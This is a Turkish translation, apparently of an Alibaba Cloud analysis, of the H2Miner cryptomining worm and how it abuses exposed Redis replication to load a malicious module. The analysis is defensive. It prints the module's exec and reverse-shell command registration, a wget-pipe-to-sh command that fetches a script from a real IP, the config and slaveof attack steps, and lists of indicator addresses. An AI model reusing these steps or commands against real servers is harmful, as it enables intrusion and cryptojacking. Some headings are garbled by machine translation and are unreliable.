Bir gün önce projemin sunucularından biri benzer bir solucanın saldırısına uğradı. “O neydi?” sorusuna yanıt arıyoruz. Alibaba Bulut Güvenliği ekibinin harika bir makalesini buldum. Bu makaleyi Habré'de bulamadığım için özellikle sizin için tercüme etmeye karar verdim <3
Giriş
Son zamanlarda Alibaba Cloud'un güvenlik ekibi ani bir H2Miner salgını keşfetti. Bu tür kötü niyetli solucan, Redis'e yönelik yetki eksikliğini veya zayıf şifreleri sistemlerinize ağ geçidi olarak kullanır, ardından master-slave senkronizasyonu yoluyla kendi kötü amaçlı modülünü köle ile senkronize eder ve son olarak bu kötü amaçlı modülü saldırıya uğrayan makineye indirir ve kötü amaçlı yazılımları çalıştırır. talimatlar.
Geçmişte sistemlerinize yapılan saldırılar öncelikle, saldırganın Redis'te oturum açmasının ardından makinenize yazılan, planlanmış görevleri veya SSH anahtarlarını içeren bir yöntem kullanılarak gerçekleştiriliyordu. Neyse ki bu yöntem, izin kontrolündeki sorunlar veya farklı sistem sürümleri nedeniyle sıklıkla kullanılamıyor. Ancak kötü amaçlı bir modülü yüklemenin bu yöntemi, saldırganın komutlarını doğrudan çalıştırabilir veya kabuğa erişim sağlayabilir ve bu da sisteminiz için tehlikelidir.
İnternette barındırılan çok sayıda Redis sunucusu nedeniyle (yaklaşık 1 milyon), Alibaba Cloud'un güvenlik ekibi, dostane bir hatırlatma olarak, kullanıcıların Redis'i çevrimiçi paylaşmamalarını ve şifrelerinin gücünü ve güvenliğinin ihlal edilip edilmediğini düzenli olarak kontrol etmelerini tavsiye ediyor. hızlı seçim.
H2Miner
H2Miner, Hadoop ipliği, Docker ve Redis uzaktan komut yürütme (RCE) güvenlik açıklarındaki yetki eksikliği de dahil olmak üzere sisteminizi çeşitli şekillerde istila edebilen, Linux tabanlı sistemlere yönelik bir madencilik botnet'idir. Bir botnet, verilerinizi araştırmak, saldırıyı yatay olarak genişletmek ve komuta ve kontrol (C&C) iletişimini sürdürmek için kötü amaçlı komut dosyaları ve kötü amaçlı yazılımlar indirerek çalışır.
Redis RCE
Bu konudaki bilgiler Pavel Toporkov tarafından ZeroNights 2018'de paylaşıldı. Sürüm 4.0'dan sonra Redis, kullanıcılara belirli Redis komutlarını yürütmek için C ile derlenen dosyaları Redis'e yükleme olanağı veren bir eklenti yükleme özelliğini destekliyor. Bu işlev, kullanışlı olmasına rağmen, ana-bağımlı modunda dosyaların tam yeniden eşitleme modu aracılığıyla ikincil ile senkronize edilebildiği bir güvenlik açığı içerir. Bu, bir saldırgan tarafından kötü amaçlı dosyaları aktarmak için kullanılabilir. Aktarım tamamlandıktan sonra saldırganlar, modülü saldırıya uğrayan Redis örneğine yükler ve herhangi bir komutu çalıştırır.
Kötü Amaçlı Yazılım Solucan Analizi
Son zamanlarda Alibaba Cloud güvenlik ekibi, H2Miner kötü niyetli madenci grubunun boyutunun aniden önemli ölçüde arttığını keşfetti. Yapılan analize göre saldırının genel oluşum süreci şu şekildedir:
H2Miner tam teşekküllü bir saldırı için RCE Redis'i kullanıyor. Saldırganlar öncelikle korumasız Redis sunucularına veya zayıf parolalara sahip sunuculara saldırır.
Daha sonra şu komutu kullanırlar: config set dbfilename red2.so Dosya adını değiştirmek için. Bundan sonra saldırganlar komutu yürütür. slaveof ana-bağımlı çoğaltma ana bilgisayar adresini ayarlamak için.
Saldırıya uğrayan Redis örneği, saldırganın sahip olduğu kötü amaçlı Redis ile master-slave bağlantısı kurduğunda, saldırgan, dosyaları senkronize etmek için fullresync komutunu kullanarak etkilenen modülü gönderir. Red2.so dosyası daha sonra saldırıya uğrayan makineye indirilecektir. Saldırganlar daha sonra bu so dosyasını yüklemek için ./red2.so yükleme modülünü kullanır. Modül, saldırganın komutlarını çalıştırabilir veya saldırıya uğrayan makineye erişim sağlamak için ters bağlantı (arka kapı) başlatabilir.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Gibi kötü amaçlı bir komut yürüttükten sonra / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1saldırgan, izleri temizlemek için yedek dosya adını sıfırlayacak ve sistem modülünü kaldıracaktır. Ancak red2.so dosyası saldırıya uğrayan makinede kalmaya devam edecek. Kullanıcıların, Redis örneklerinin klasöründe böyle şüpheli bir dosyanın varlığına dikkat etmeleri önerilir.
Saldırgan, kaynakları çalmak için bazı kötü amaçlı işlemleri öldürmenin yanı sıra, kötü amaçlı ikili dosyaları indirip çalıştırarak kötü amaçlı bir komut dosyası izledi. . Bu, ana bilgisayardaki kining içeren işlem adının veya dizin adının, o makineye bu virüsün bulaştığını gösterebileceği anlamına gelir.
Tersine mühendislik sonuçlarına göre, kötü amaçlı yazılım temel olarak aşağıdaki işlevleri yerine getiriyor:
- Dosyaları yükleme ve çalıştırma
- madencilik
- C&C iletişimini sürdürmek ve saldırgan komutlarını yürütmek
Etkinizi genişletmek için harici tarama için masscan'ı kullanın. Ek olarak, C&C sunucusunun IP adresi programda sabit kodlanmıştır ve saldırıya uğrayan ana bilgisayar, zombi (güvenliği aşılmış sunucu) bilgilerinin HTTP başlığında tanımlandığı HTTP isteklerini kullanarak C&C iletişim sunucusuyla iletişim kuracaktır.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Diğer saldırı yöntemleri
Solucanın kullandığı adresler ve bağlantılar
/akrabalık
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
bilim ve teknoloji
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
konsey
Öncelikle Redis'in internetten erişilebilir olmaması ve güçlü bir şifre ile korunması gerekmektedir. İstemcilerin Redis dizininde red2.so dosyası olmadığını ve ana bilgisayardaki dosya/işlem adında "kinsing" olmadığını kontrol etmeleri de önemlidir.
Kaynak: habr.com